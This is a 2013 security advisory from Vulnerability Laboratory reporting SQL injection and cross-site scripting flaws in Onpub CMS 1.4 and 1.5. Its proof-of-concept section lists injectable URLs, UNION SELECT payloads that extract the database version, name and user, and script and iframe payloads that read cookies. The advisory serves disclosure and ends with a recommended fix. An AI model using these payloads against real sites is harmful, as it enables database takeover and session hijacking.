211 lines
No EOL
8.8 KiB
Text
211 lines
No EOL
8.8 KiB
Text
Document Title:
|
||
===============
|
||
Onpub CMS 1.4 & 1.5 - Multiple SQL Injection Vulnerabilities
|
||
|
||
|
||
References (Source):
|
||
====================
|
||
http://www.vulnerability-lab.com/get_content.php?id=1120
|
||
|
||
|
||
Release Date:
|
||
=============
|
||
2013-10-26
|
||
|
||
|
||
Vulnerability Laboratory ID (VL-ID):
|
||
====================================
|
||
1120
|
||
|
||
|
||
Common Vulnerability Scoring System:
|
||
====================================
|
||
8.2
|
||
|
||
|
||
Product & Service Introduction:
|
||
===============================
|
||
Onpub is a web content management system (CMS) designed for those with intermediate to advanced web development skills
|
||
looking to quickly set up custom, dynamic websites that are quick to update and easy to maintain. All Onpub content is
|
||
stored in a fast and reliable MySQL database backend. There are many ways to customize and extend Onpub`s default
|
||
design and functionality via open-standard web development tools and techniques.
|
||
|
||
Onpub is ideal for those with no desire to implement a CMS from scratch, but still need a custom, yet agile solution.
|
||
Onpub tightly integrates many widely used third-party web apps and scripts in to one coherent system to build further upon.
|
||
|
||
( Copy of the Vendor Homepage: http://onpub.com/ )
|
||
|
||
|
||
Abstract Advisory Information:
|
||
==============================
|
||
The Vulnerability Laboratory Research Team discovered multiple remote web vulnerabilities in the Onpub v1.5 Content Management System web-application.
|
||
|
||
|
||
Vulnerability Disclosure Timeline:
|
||
==================================
|
||
2013-10-26: Public Disclosure (Vulnerability Laboratory)
|
||
|
||
|
||
Discovery Status:
|
||
=================
|
||
Published
|
||
|
||
|
||
Affected Product(s):
|
||
====================
|
||
Onpub
|
||
Product: Onpub - Content Management System 1.4 Lite and 1.5
|
||
|
||
|
||
Exploitation Technique:
|
||
=======================
|
||
Remote
|
||
|
||
|
||
Severity Level:
|
||
===============
|
||
Critical
|
||
|
||
|
||
Technical Details & Description:
|
||
================================
|
||
1.1
|
||
Multiple remote sql injection web vulnerabilities are detected in the official in the Onpub v1.4 and 1.5 Content Management System web-application.
|
||
The vulnerability allows remote attackers to unauthorized inject own sql commands to compromise the web-application or the web-server dbms.
|
||
|
||
The sql injection vulnerabilities are located in the `websiteID`,`imageID`,`keywords`,`orderBy`,`order` and `articleID` values of the index.php file.
|
||
Remote attackers are able to inject own sql commands via GET method request to compromise the database management system or cms web-application.
|
||
The inject can be done by usage of the manage path via GET method request or by usage of the articleID in the index.php file POST method request.
|
||
The severity of the remote sql injection bugs is estimated as critical.
|
||
|
||
Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account.
|
||
Successful exploitation of the remote sql injection bug results in database management system and cms or web-application compromise.
|
||
|
||
|
||
Vulnerable Module(s):
|
||
[+] Manage
|
||
|
||
Vulnerable File(s):
|
||
[+] index.php
|
||
|
||
Vulnerable Parameter(s):
|
||
[+] websiteID
|
||
[+] imageID
|
||
[+] keywords
|
||
[+] orderBy
|
||
[+] order
|
||
[+] articleID
|
||
|
||
|
||
|
||
2.1
|
||
A client-side post inject web vulnerability is detected in the official in the Onpub v1.4 and v1.5 Content Management System web-application.
|
||
The vulnerability allows remote attackers to manipulate via POST method web-application to browser requests (client-side).
|
||
|
||
The client-side cross site scripting web vulnerability is located in the vulnerable `page` parameter of the index.php file (manage module).
|
||
Remote attackers can manipulate the `page` parameter in the `index.php` file via GET method request to compromise client-side application context.
|
||
|
||
Successful exploitation of the client-side cross site scripting web vulnerability results in session hijacking, client-side phishing,
|
||
client-side unauthorized external redirects and client-side manipulation of the contact formular module context.
|
||
|
||
|
||
Vulnerable Module(s):
|
||
[+] Manage
|
||
|
||
Vulnerable File(s):
|
||
[+] index.php
|
||
|
||
Vulnerable Parameter(s):
|
||
[+] page
|
||
|
||
|
||
|
||
Proof of Concept (PoC):
|
||
=======================
|
||
1.1
|
||
The sql injection web vulnerabilities can be exploited by remote attackers without privileged application user account and user interaction.
|
||
For demonstration or to reproduce ...
|
||
|
||
PoC:
|
||
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsite&websiteID=-1%27[SQL-INJECTION VULNERABILITY!]
|
||
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&fullTextSearch=1&keywords=-1%27[SQL-INJECTION VULNERABILITY!]
|
||
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditWebsites&orderBy=-1%27[SQL-INJECTION VULNERABILITY!]&order=ASC
|
||
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticles&orderBy=title&order=[SQL-INJECTION VULNERABILITY!]
|
||
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImage&imageID=2%27a[SQL-INJECTION VULNERABILITY!]
|
||
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditArticle&articleID=1%20[SQL-INJECTION VULNERABILITY!]
|
||
|
||
|
||
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@version--
|
||
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@database--
|
||
onpub/index.php?onpub=EditWebsite&websiteID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,@@user--
|
||
|
||
|
||
|
||
|
||
|
||
2.1
|
||
The client-side cross site scripting web vulnerability can be exploited by remote attackers without privileged application user account
|
||
and with low user interaction click. For demonstration or to reproduce ...
|
||
|
||
|
||
PoC:
|
||
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=2%27%22%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
|
||
|
||
http://onpub.localhost:8080/onpub/manage/index.php?onpub=EditImages&page=137%20>"<iframe%20src=http://www.vulnerability-lab.com>
|
||
|
||
|
||
Solution - Fix & Patch:
|
||
=======================
|
||
1.1
|
||
Parse in the index.php file the vulnerable `websiteID`,`imageID`,`keywords`,`articleID`,`orderBy`,`order` parameters.
|
||
Use the mysql_real_escape_string() or a prepared statement to prevent sql injection attacks.
|
||
|
||
2.1
|
||
Parse or encode the vulnerable page parameter in the index.php file to prevent client-side cross site scripting attacks.
|
||
|
||
|
||
Security Risk:
|
||
==============
|
||
1.1
|
||
The security risk of the remote sql injection web vulnerabilities are estimated as critical.
|
||
|
||
1.2
|
||
The security risk of the client-side cross site scripting web vulnerability is estimated as medium(-).
|
||
|
||
|
||
Credits & Authors:
|
||
==================
|
||
Vulnerability Laboratory [Research Team] - Marcel Bernhardt (smash@evolution-sec.com)
|
||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com)
|
||
|
||
|
||
Disclaimer & Information:
|
||
=========================
|
||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
||
or trade with fraud/stolen material.
|
||
|
||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||
|
||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
|
||
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
||
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||
|
||
Copyright <20> 2013 | Vulnerability Laboratory [Evolution Security]
|
||
|
||
|
||
|
||
--
|
||
VULNERABILITY LABORATORY RESEARCH TEAM
|
||
DOMAIN: www.vulnerability-lab.com
|
||
CONTACT: research@vulnerability-lab.com |